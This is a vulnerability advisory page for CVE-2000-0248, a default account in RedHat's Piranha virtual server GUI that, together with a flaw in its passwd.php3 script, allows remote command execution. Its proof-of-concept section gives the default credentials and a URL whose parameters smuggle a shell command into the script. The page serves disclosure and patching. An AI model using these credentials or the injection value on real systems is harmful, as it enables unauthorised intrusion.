RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

BID:1148

Info

RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

Bugtraq ID: 1148
Class: Configuration Error
CVE: CVE-2000-0248
Remote: Yes
Local: No
Published: Apr 24 2000 12:00AM
Updated: Jul 11 2009 01:56AM
Credit: This vulnerability was announced in an advisory from ISS on April 24, 2000. Exploit information was made available in a Bugtraq post on April 24, 2000 by Max Vision <[email protected]>
Vulnerable: Redhat piranha-gui-0.4.12-1.i386.rpm
+ Redhat Linux 6.2
Redhat Linux 6.2 sparc
Redhat Linux 6.2 i386
Redhat Linux 6.2 alpha
Not Vulnerable:

Discussion

RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

A default username and password has been discovered in the Piranha virtual server and load balancing package from RedHat. Version 0.4.12 of the piranha-gui program contains a default account, piranha, with the password 'q' (no quotes). Using this username and password, in conjunction with flaws in the passwd.php3 script (also part of piranha) will allow remote users to execute arbitrary commands on the machine.

Exploit / POC

RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

The default username and password are piranha, and q, respectively.

Execute the following url, using the above information to authenticate: http://victim.example.com/piranha/secure/passwd.php3

Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&amp;try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&amp;passwd=ACCEPT

This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.

Solution / Fix

RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

Solution:
A patch is available from RedHat


Redhat piranha-gui-0.4.12-1.i386.rpm

Redhat Linux 6.2 i386

References

RedHat Piranha Virtual Server Package Default Account and Password Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report